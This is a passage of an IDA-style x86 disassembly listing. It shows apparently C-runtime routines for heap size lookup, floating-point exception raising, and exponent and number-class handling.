call ds:dword_41F118 ; IsBadCodePtr
test eax, eax
jz short loc_41CE11
xor esi, esi
loc_41CE11: ; CODE XREF: sub_41CDFD+10�j
mov eax, esi
pop esi
retn
sub_41CDFD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418F0B
loc_41CE15: ; CODE XREF: sub_418F0B:loc_418F3B�j
push 0Ah
call sub_419E4A
push 16h
call sub_41E363
pop ecx
pop ecx
push 3
call sub_414544
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_418F0B
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE2D proc near ; CODE XREF: sub_41965E+7�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_428758
call __SEH_prolog
cmp dword_47A640, 3
jnz short loc_41CE7C
push 4
call sub_416901
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
push esi
call sub_41697A
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_41CE6A
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_20], esi
jmp short loc_41CE6D
; ---------------------------------------------------------------------------
loc_41CE6A: ; CODE XREF: sub_41CE2D+30�j
mov esi, [ebp+var_20]
loc_41CE6D: ; CODE XREF: sub_41CE2D+3B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41CE9A
cmp [ebp+var_1C], 0
jnz short loc_41CE8F
loc_41CE7C: ; CODE XREF: sub_41CE2D+13�j
push [ebp+arg_0]
push 0
push dword_47A63C
call ds:dword_41F114 ; RtlSizeHeap
mov esi, eax
loc_41CE8F: ; CODE XREF: sub_41CE2D+4D�j
mov eax, esi
call __SEH_epilog
retn
sub_41CE2D endp
; =============== S U B R O U T I N E =======================================
sub_41CE97 proc near ; DATA XREF: .rdata:stru_428758�o
mov esi, [ebp-20h]
sub_41CE97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41CE9A proc near ; CODE XREF: sub_41CE2D+44�p
push 4
call sub_41686D
pop ecx
retn
sub_41CE9A endp
; =============== S U B R O U T I N E =======================================
sub_41CEA3 proc near ; CODE XREF: sub_4197D8+11D�p
; sub_4197D8+1D8�p ...
xor eax, eax
retn
sub_41CEA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEA6 proc near ; CODE XREF: sub_41D4B3+4D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
push ebx
xor ebx, ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
push esi
inc ebx
test cl, 10h
push edi
jz short loc_41CED8
mov eax, [ebp+arg_0]
or [eax+4], ebx
mov [ebp+arg_8], 0C000008Fh
loc_41CED8: ; CODE XREF: sub_41CEA6+23�j
test cl, 2
jz short loc_41CEEB
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 2
mov [ebp+arg_8], 0C0000093h
loc_41CEEB: ; CODE XREF: sub_41CEA6+35�j
test cl, bl
jz short loc_41CEFD
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 4
mov [ebp+arg_8], 0C0000091h
loc_41CEFD: ; CODE XREF: sub_41CEA6+47�j
test cl, 4
jz short loc_41CF10
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 8
mov [ebp+arg_8], 0C000008Eh
loc_41CF10: ; CODE XREF: sub_41CEA6+5A�j
test cl, 8
jz short loc_41CF23
mov eax, [ebp+arg_0]
or dword ptr [eax+4], 10h
mov [ebp+arg_8], 0C0000090h
loc_41CF23: ; CODE XREF: sub_41CEA6+6D�j
mov esi, [ebp+arg_4]
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 4
not ecx
xor ecx, [eax+8]
push 2
and ecx, 10h
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shl ecx, 1
not ecx
xor ecx, [eax+8]
pop edi
and ecx, 8
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 1
not ecx
xor ecx, [eax+8]
and ecx, 4
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 3
not ecx
xor ecx, [eax+8]
and ecx, edi
xor [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
shr ecx, 5
not ecx
xor ecx, [eax+8]
and ecx, ebx
xor [eax+8], ecx
call sub_41D6C3
test al, bl
jz short loc_41CF94
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_41CF94: ; CODE XREF: sub_41CEA6+E5�j
test al, 4
jz short loc_41CF9F
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_41CF9F: ; CODE XREF: sub_41CEA6+F0�j
test al, 8
jz short loc_41CFAA
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_41CFAA: ; CODE XREF: sub_41CEA6+FB�j
test al, 10h
jz short loc_41CFB4
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_41CFB4: ; CODE XREF: sub_41CEA6+106�j
test al, 20h
jz short loc_41CFBE
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_41CFBE: ; CODE XREF: sub_41CEA6+110�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_41CFFD
cmp eax, 400h
jz short loc_41CFEF
cmp eax, 800h
jz short loc_41CFE3
cmp eax, ecx
jnz short loc_41D003
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_41D003
; ---------------------------------------------------------------------------
loc_41CFE3: ; CODE XREF: sub_41CEA6+12F�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_41CFF9
; ---------------------------------------------------------------------------
loc_41CFEF: ; CODE XREF: sub_41CEA6+128�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_41CFF9: ; CODE XREF: sub_41CEA6+147�j
mov [eax], ecx
jmp short loc_41D003
; ---------------------------------------------------------------------------
loc_41CFFD: ; CODE XREF: sub_41CEA6+121�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_41D003: ; CODE XREF: sub_41CEA6+133�j
; sub_41CEA6+13B�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_41D02E
cmp eax, 200h
jz short loc_41D021
cmp eax, ecx
jnz short loc_41D03B
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_41D03B
; ---------------------------------------------------------------------------
loc_41D021: ; CODE XREF: sub_41CEA6+16D�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_41D039
; ---------------------------------------------------------------------------
loc_41D02E: ; CODE XREF: sub_41CEA6+166�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_41D039: ; CODE XREF: sub_41CEA6+186�j
mov [eax], ecx
loc_41D03B: ; CODE XREF: sub_41CEA6+171�j
; sub_41CEA6+179�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
shl ecx, 5
xor ecx, [eax]
and ecx, 1FFE0h
xor [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+60h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+60h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+60h], ecx
fld qword ptr [edi]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+50h]
call sub_41D6D0
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_41F110 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_41D0AD
and dword ptr [esi], 0FFFFFFFEh
loc_41D0AD: ; CODE XREF: sub_41CEA6+202�j
test byte ptr [eax+8], 8
jz short loc_41D0B6
and dword ptr [esi], 0FFFFFFFBh
loc_41D0B6: ; CODE XREF: sub_41CEA6+20B�j
test byte ptr [eax+8], 4
jz short loc_41D0BF
and dword ptr [esi], 0FFFFFFF7h
loc_41D0BF: ; CODE XREF: sub_41CEA6+214�j
test byte ptr [eax+8], 2
jz short loc_41D0C8
and dword ptr [esi], 0FFFFFFEFh
loc_41D0C8: ; CODE XREF: sub_41CEA6+21D�j
test [eax+8], bl
jz short loc_41D0D0
and dword ptr [esi], 0FFFFFFDFh
loc_41D0D0: ; CODE XREF: sub_41CEA6+225�j
mov ecx, [eax]
and ecx, 3
sub ecx, 0
mov edx, 0FFFFF3FFh
jz short loc_41D110
dec ecx
jz short loc_41D0FE
dec ecx
jz short loc_41D0EE
dec ecx
jnz short loc_41D112
or byte ptr [esi+1], 0Ch
jmp short loc_41D112
; ---------------------------------------------------------------------------
loc_41D0EE: ; CODE XREF: sub_41CEA6+23D�j
mov ecx, [esi]
and ecx, 0FFFFFBFFh
or ecx, 800h
jmp short loc_41D10C
; ---------------------------------------------------------------------------
loc_41D0FE: ; CODE XREF: sub_41CEA6+23A�j
mov ecx, [esi]
and ecx, 0FFFFF7FFh
or ecx, 400h
loc_41D10C: ; CODE XREF: sub_41CEA6+256�j
mov [esi], ecx
jmp short loc_41D112
; ---------------------------------------------------------------------------
loc_41D110: ; CODE XREF: sub_41CEA6+237�j
and [esi], edx
loc_41D112: ; CODE XREF: sub_41CEA6+240�j
; sub_41CEA6+246�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_41D135
dec ecx
jz short loc_41D129
dec ecx
jnz short loc_41D141
and [esi], edx
jmp short loc_41D141
; ---------------------------------------------------------------------------
loc_41D129: ; CODE XREF: sub_41CEA6+27A�j
mov ecx, [esi]
and ecx, edx
or ecx, 200h
jmp short loc_41D13F
; ---------------------------------------------------------------------------
loc_41D135: ; CODE XREF: sub_41CEA6+277�j
mov ecx, [esi]
and ecx, edx
or ecx, 300h
loc_41D13F: ; CODE XREF: sub_41CEA6+28D�j
mov [esi], ecx
loc_41D141: ; CODE XREF: sub_41CEA6+27D�j
; sub_41CEA6+281�j
fld qword ptr [eax+50h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41CEA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D14B proc near ; CODE XREF: sub_41D4B3+25�p
var_28 = qword ptr -28h
var_10 = qword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push ebx
push esi
xor ebx, ebx
mov esi, eax
and esi, 1Fh
inc ebx
test al, 8
mov [ebp+var_4], esi
jz short loc_41D179
test byte ptr [ebp+arg_8], bl
jz short loc_41D179
push ebx
call sub_41D702
pop ecx
and esi, 0FFFFFFF7h
jmp loc_41D34B
; ---------------------------------------------------------------------------
loc_41D179: ; CODE XREF: sub_41D14B+18�j
; sub_41D14B+1D�j
test al, 4
jz short loc_41D193
test byte ptr [ebp+arg_8], 4
jz short loc_41D193
push 4
call sub_41D702
pop ecx
and esi, 0FFFFFFFBh
jmp loc_41D34B
; ---------------------------------------------------------------------------
loc_41D193: ; CODE XREF: sub_41D14B+30�j
; sub_41D14B+36�j
test al, bl
jz loc_41D273
test byte ptr [ebp+arg_8], 8
jz loc_41D273
push 8
call sub_41D702
mov eax, [ebp+arg_8]
pop ecx
mov ecx, 0C00h
and eax, ecx
jz loc_41D249
cmp eax, 400h
jz short loc_41D21F
cmp eax, 800h
jz short loc_41D1F5
cmp eax, ecx
jnz loc_41D26B
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_427A60
fld dbl_42D2E0
fnstsw ax
test ah, 41h
jz short loc_41D1ED
fchs
loc_41D1ED: ; CODE XREF: sub_41D14B+9E�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_41D269
; ---------------------------------------------------------------------------
loc_41D1F5: ; CODE XREF: sub_41D14B+7E�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_427A60
fnstsw ax
test ah, 41h
jnz short loc_41D20F
fld dbl_42D2D0
jmp short loc_41D217
; ---------------------------------------------------------------------------
loc_41D20F: ; CODE XREF: sub_41D14B+BA�j
fld dbl_42D2E0
fchs
loc_41D217: ; CODE XREF: sub_41D14B+C2�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_41D269
; ---------------------------------------------------------------------------
loc_41D21F: ; CODE XREF: sub_41D14B+77�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_427A60
fnstsw ax
test ah, 41h
jnz short loc_41D239
fld dbl_42D2E0
jmp short loc_41D241
; ---------------------------------------------------------------------------
loc_41D239: ; CODE XREF: sub_41D14B+E4�j
fld dbl_42D2D0
fchs
loc_41D241: ; CODE XREF: sub_41D14B+EC�j
fstp [ebp+var_10]
fld [ebp+var_10]
jmp short loc_41D269
; ---------------------------------------------------------------------------
loc_41D249: ; CODE XREF: sub_41D14B+6C�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_427A60
fld dbl_42D2D0
fnstsw ax
test ah, 41h
jz short loc_41D263
fchs
loc_41D263: ; CODE XREF: sub_41D14B+114�j
fstp [ebp+var_10]
fld [ebp+var_10]
loc_41D269: ; CODE XREF: sub_41D14B+A8�j
; sub_41D14B+D2�j ...
fstp qword ptr [ecx]
loc_41D26B: ; CODE XREF: sub_41D14B+82�j
and esi, 0FFFFFFFEh
jmp loc_41D34B
; ---------------------------------------------------------------------------
loc_41D273: ; CODE XREF: sub_41D14B+4A�j
; sub_41D14B+54�j
test al, 2
jz loc_41D34B
test byte ptr [ebp+arg_8], 10h
jz loc_41D34B
xor esi, esi
test al, 10h
jz short loc_41D28D
mov esi, ebx
loc_41D28D: ; CODE XREF: sub_41D14B+13E�j
push edi
mov edi, [ebp+arg_4]
fld qword ptr [edi]
fcomp ds:dbl_427A60
fnstsw ax
test ah, 44h
jnp loc_41D335
fld qword ptr [edi]
lea eax, [ebp+var_8]
push eax ; int
push ecx
push ecx ; double
fstp [esp+28h+var_28]
call sub_41D609
mov ecx, [ebp+var_8]
fstp [ebp+var_10]
fld [ebp+var_10]
add ecx, 0FFFFFA00h
add esp, 0Ch
cmp ecx, 0FFFFFBCEh
jge short loc_41D2D8
fmul ds:dbl_427A60
mov esi, ebx
jmp short loc_41D32B
; ---------------------------------------------------------------------------
loc_41D2D8: ; CODE XREF: sub_41D14B+181�j
fcomp ds:dbl_427A60
fnstsw ax
test ah, 5
jp short loc_41D2E9
mov edx, ebx
jmp short loc_41D2EB
; ---------------------------------------------------------------------------
loc_41D2E9: ; CODE XREF: sub_41D14B+198�j
xor edx, edx
loc_41D2EB: ; CODE XREF: sub_41D14B+19C�j
xor eax, eax
mov al, byte ptr [ebp+var_10+6]
and eax, 0Fh
or eax, 10h
mov word ptr [ebp+var_10+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_41D322
sub eax, ecx
loc_41D305: ; CODE XREF: sub_41D14B+1D5�j
test byte ptr [ebp+var_10], bl
jz short loc_41D310
test esi, esi
jnz short loc_41D310
mov esi, ebx
loc_41D310: ; CODE XREF: sub_41D14B+1BD�j
; sub_41D14B+1C1�j
shr dword ptr [ebp+var_10], 1
test byte ptr [ebp+var_10+4], bl
jz short loc_41D31C
or byte ptr [ebp+var_10+3], 80h
loc_41D31C: ; CODE XREF: sub_41D14B+1CB�j
shr dword ptr [ebp+var_10+4], 1
dec eax
jnz short loc_41D305
loc_41D322: ; CODE XREF: sub_41D14B+1B6�j
test edx, edx
jz short loc_41D32E
fld [ebp+var_10]
fchs
loc_41D32B: ; CODE XREF: sub_41D14B+18B�j
fstp [ebp+var_10]
loc_41D32E: ; CODE XREF: sub_41D14B+1D9�j
fld [ebp+var_10]
fstp qword ptr [edi]
jmp short loc_41D337
; ---------------------------------------------------------------------------
loc_41D335: ; CODE XREF: sub_41D14B+153�j
mov esi, ebx
loc_41D337: ; CODE XREF: sub_41D14B+1E8�j
test esi, esi
pop edi
jz short loc_41D344
push 10h
call sub_41D702
pop ecx
loc_41D344: ; CODE XREF: sub_41D14B+1EF�j
and [ebp+var_4], 0FFFFFFFDh
mov esi, [ebp+var_4]
loc_41D34B: ; CODE XREF: sub_41D14B+29�j
; sub_41D14B+43�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_41D362
test byte ptr [ebp+arg_8], 20h
jz short loc_41D362
push 20h
call sub_41D702
pop ecx
and esi, 0FFFFFFEFh
loc_41D362: ; CODE XREF: sub_41D14B+204�j
; sub_41D14B+20A�j
xor eax, eax
test esi, esi
pop esi
setz al
pop ebx
leave
retn
sub_41D14B endp
; =============== S U B R O U T I N E =======================================
sub_41D36D proc near ; CODE XREF: sub_41D3C2+6C�p
; sub_41D3C2+91�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_41D389
jle short locret_41D394
cmp eax, 3
jg short locret_41D394
call sub_417C70
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_41D389: ; CODE XREF: sub_41D36D+7�j
call sub_417C70
mov dword ptr [eax], 21h
locret_41D394: ; CODE XREF: sub_41D36D+9�j
; sub_41D36D+E�j
retn
sub_41D36D endp
; =============== S U B R O U T I N E =======================================
sub_41D395 proc near ; CODE XREF: sub_41D4B3+58�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_41D3A1
push 5
jmp short loc_41D3B7
; ---------------------------------------------------------------------------
loc_41D3A1: ; CODE XREF: sub_41D395+6�j
test al, 8
jz short loc_41D3A9
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D3A9: ; CODE XREF: sub_41D395+E�j
test al, 4
jz short loc_41D3B1
push 2
jmp short loc_41D3B7
; ---------------------------------------------------------------------------
loc_41D3B1: ; CODE XREF: sub_41D395+16�j
test al, 1
jz short loc_41D3B9
push 3
loc_41D3B7: ; CODE XREF: sub_41D395+A�j
; sub_41D395+1A�j
pop eax
retn
; ---------------------------------------------------------------------------
loc_41D3B9: ; CODE XREF: sub_41D395+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_41D395 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D3C2(int,int,int,int,int,int,double,int)
sub_41D3C2 proc near ; CODE XREF: sub_41D460+2A�p
; sub_41D4B3+8A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
xor eax, eax
loc_41D3CA: ; CODE XREF: sub_41D3C2+18�j
mov ecx, dword_42D1E8[eax*8]
cmp ecx, [ebp+arg_4]
jz short loc_41D43A
inc eax
cmp eax, 1Dh
jl short loc_41D3CA
xor eax, eax
loc_41D3DE: ; CODE XREF: sub_41D3C2+7F�j
test eax, eax
mov [ebp+var_1C], eax
jz short loc_41D443
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8+4], eax
call sub_41D6DE
lea eax, [ebp+var_20]
push eax
call sub_41CEA3
add esp, 0Ch
test eax, eax
jnz short loc_41D434
push esi
call sub_41D36D
pop ecx
loc_41D434: ; CODE XREF: sub_41D3C2+69�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_41D43A: ; CODE XREF: sub_41D3C2+12�j
mov eax, off_42D1EC[eax*8]
jmp short loc_41D3DE
; ---------------------------------------------------------------------------
loc_41D443: ; CODE XREF: sub_41D3C2+21�j
push 0FFFFh
push [ebp+arg_20]
call sub_41D6DE
push [ebp+arg_0]
call sub_41D36D
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_41D3C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D460(int,double,int)
sub_41D460 proc near ; CODE XREF: sub_419AF8+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_42D1E0, 0
jnz short loc_41D494
push [ebp+arg_C] ; int
fld [ebp+arg_4]
sub esp, 18h
fstp [esp+1Ch+var_C]
fldz
fstp [esp+1Ch+var_14]
fld [ebp+arg_4]
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_41D3C2
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41D494: ; CODE XREF: sub_41D460+A�j
call sub_417C70
push 0FFFFh
push [ebp+arg_C]
mov dword ptr [eax], 21h
call sub_41D6DE
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_41D460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D4B3(int,int,double,double,int)
sub_41D4B3 proc near ; CODE XREF: sub_419AF8:loc_419BBD�p
var_9C = qword ptr -9Ch
var_94 = qword ptr -94h
var_8C = qword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_40 = dword ptr -40h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 80h
mov eax, dword_42CE38
xor eax, [ebp+4]
push [ebp+arg_18]
mov [esp+84h+var_4], eax
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_41D14B
add esp, 0Ch
test eax, eax
jnz short loc_41D508
and [esp+80h+var_40], 0FFFFFFFEh
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_18]
push [ebp+arg_0]
push eax
lea eax, [esp+94h+var_80]
push eax
call sub_41CEA6
add esp, 18h
loc_41D508: ; CODE XREF: sub_41D4B3+2F�j
push [ebp+arg_0]
call sub_41D395
add esp, 4
cmp dword_42D1E0, 0
jnz short loc_41D547
test eax, eax
jz short loc_41D547
push [ebp+arg_18] ; int
fld [ebp+arg_10]
sub esp, 18h
fstp [esp+9Ch+var_8C]
fldz
fstp [esp+9Ch+var_94]
fld [ebp+arg_8]
fstp [esp+9Ch+var_9C]
push [ebp+arg_4] ; int
push eax ; int
call sub_41D3C2
add esp, 24h
jmp short loc_41D561
; ---------------------------------------------------------------------------
loc_41D547: ; CODE XREF: sub_41D4B3+67�j
; sub_41D4B3+6B�j
push eax
call sub_41D36D
mov [esp+84h+var_84], 0FFFFh
push [ebp+arg_18]
call sub_41D6DE
fld [ebp+arg_10]
pop ecx
pop ecx
loc_41D561: ; CODE XREF: sub_41D4B3+92�j
mov ecx, [esp+80h+var_4]
xor ecx, [ebp+4]
call sub_4182D6
mov esp, ebp
pop ebp
retn
sub_41D4B3 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41D571(double)
sub_41D571 proc near ; CODE XREF: sub_419AF8:loc_419B7E�p
var_8 = qword ptr -8
arg_0 = qword ptr 4
push ecx
push ecx
fld [esp+8+arg_0]
frndint
fstp [esp+8+var_8]
fld [esp+8+var_8]
pop ecx
pop ecx
retn
sub_41D571 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D584(double,int)
sub_41D584 proc near ; CODE XREF: sub_41D609+80�p
; sub_41D609+93�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
fld [ebp+arg_0]
mov ecx, dword ptr [ebp+arg_0+6]
fstp [ebp+var_8]
add eax, 3FEh
shl eax, 4
and ecx, 0FFFF800Fh
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_41D584 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D5AE proc near ; CODE XREF: sub_419AF8+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_41D5C6
cmp [ebp+arg_0], edx
jnz short loc_41D5D8
xor eax, eax
inc eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41D5C6: ; CODE XREF: sub_41D5AE+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_41D5D8
cmp [ebp+arg_0], edx
jnz short loc_41D5D8
push 2
jmp short loc_41D602
; ---------------------------------------------------------------------------
loc_41D5D8: ; CODE XREF: sub_41D5AE+11�j
; sub_41D5AE+1F�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_41D5EB
push 3
jmp short loc_41D602
; ---------------------------------------------------------------------------
loc_41D5EB: ; CODE XREF: sub_41D5AE+37�j
cmp cx, 7FF0h
jnz short loc_41D605
test [ebp+arg_4], 7FFFFh
jnz short loc_41D600
cmp [ebp+arg_0], edx
jz short loc_41D605
loc_41D600: ; CODE XREF: sub_41D5AE+4B�j
push 4
loc_41D602: ; CODE XREF: sub_41D5AE+28�j
; sub_41D5AE+3B�j
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41D605: ; CODE XREF: sub_41D5AE+42�j
; sub_41D5AE+50�j
xor eax, eax
pop ebp
retn
sub_41D5AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41D609(double,int)
sub_41D609 proc near ; CODE XREF: sub_41D14B+164�p
var_14 = qword ptr -14h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp ds:dbl_427A60
fnstsw ax
test ah, 44h
jp short loc_41D627
fldz
xor edx, edx
jmp loc_41D6B6
; ---------------------------------------------------------------------------
loc_41D627: ; CODE XREF: sub_41D609+13�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41D693
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_41D63F
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41D693
loc_41D63F: ; CODE XREF: sub_41D609+2F�j
fld [ebp+arg_0]
mov edx, 0FFFFFC03h
fcomp ds:dbl_427A60
fnstsw ax
test ah, 5
jp short loc_41D659
xor eax, eax
inc eax
jmp short loc_41D66E
; ---------------------------------------------------------------------------
loc_41D659: ; CODE XREF: sub_41D609+49�j
xor eax, eax
jmp short loc_41D66E
; ---------------------------------------------------------------------------
loc_41D65D: ; CODE XREF: sub_41D609+69�j
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_41D66A
or dword ptr [ebp+arg_0+4], 1
loc_41D66A: ; CODE XREF: sub_41D609+5B�j
shl dword ptr [ebp+arg_0], 1
dec edx
loc_41D66E: ; CODE XREF: sub_41D609+4E�j
; sub_41D609+52�j
test byte ptr [ebp+arg_0+6], 10h
jz short loc_41D65D
and byte ptr [ebp+arg_0+6], 0EFh
cmp eax, ecx
jz short loc_41D680
or byte ptr [ebp+arg_0+7], 80h
loc_41D680: ; CODE XREF: sub_41D609+71�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+14h+var_14]
call sub_41D584
add esp, 0Ch
jmp short loc_41D6B6
; ---------------------------------------------------------------------------
loc_41D693: ; CODE XREF: sub_41D609+26�j
; sub_41D609+34�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+14h+var_14]
call sub_41D584
mov edx, dword ptr [ebp+arg_0+6]
shr edx, 4
and edx, 7FFh
add esp, 0Ch
sub edx, 3FEh
loc_41D6B6: ; CODE XREF: sub_41D609+19�j
; sub_41D609+88�j
mov eax, [ebp+arg_8]
fstp [ebp+var_8]
fld [ebp+var_8]
mov [eax], edx
leave
retn
sub_41D609 endp
; =============== S U B R O U T I N E =======================================
